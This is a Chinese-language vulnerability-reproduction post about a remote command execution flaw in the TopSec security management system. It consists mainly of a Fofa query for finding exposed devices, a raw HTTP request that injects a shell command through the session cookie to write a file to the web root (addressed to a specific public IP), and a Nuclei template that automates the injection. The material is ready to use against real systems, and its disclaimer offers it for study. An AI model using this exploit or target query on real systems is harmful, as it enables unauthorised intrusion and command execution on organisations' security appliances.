免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
0X00 漏洞描述
天融信TopSec安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作。
0X01 Fofa语法
title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"
0X02 漏洞利用
GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: 103.242.57.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie: session_id_443=1|echo 'vulnerable' > /www/htdocs/site/image/vulnerable.txt;
Connection: close
访问/site/image/vulnerable.txt
0X03 Nuclei 检测脚本
id: topsec-maincgi-cookie-rce
info:
name: 天融信TOPSEC Cookie 远程命令执行漏洞
author: xia0chen
severity: critical
description: 天融信TOPSECCookie参数存在RCE漏洞,会导致服务器失陷。
metadata:
max-request: 1
fofa-query: title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"
verified: true
variables:
file_name: "vulnerable"
file_content: "vulnerable"
requests:
- raw:
- |+
GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: {{Hostname}}
Cookie: session_id_443=1|echo '{{file_content}}' > /www/htdocs/site/image/{{file_name}}.txt;
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
- |
GET /site/image/{{file_name}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
原文始发于微信公众号(安全攻防屋):【漏洞复现】天融信TOPSEC安全管理系统远程命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论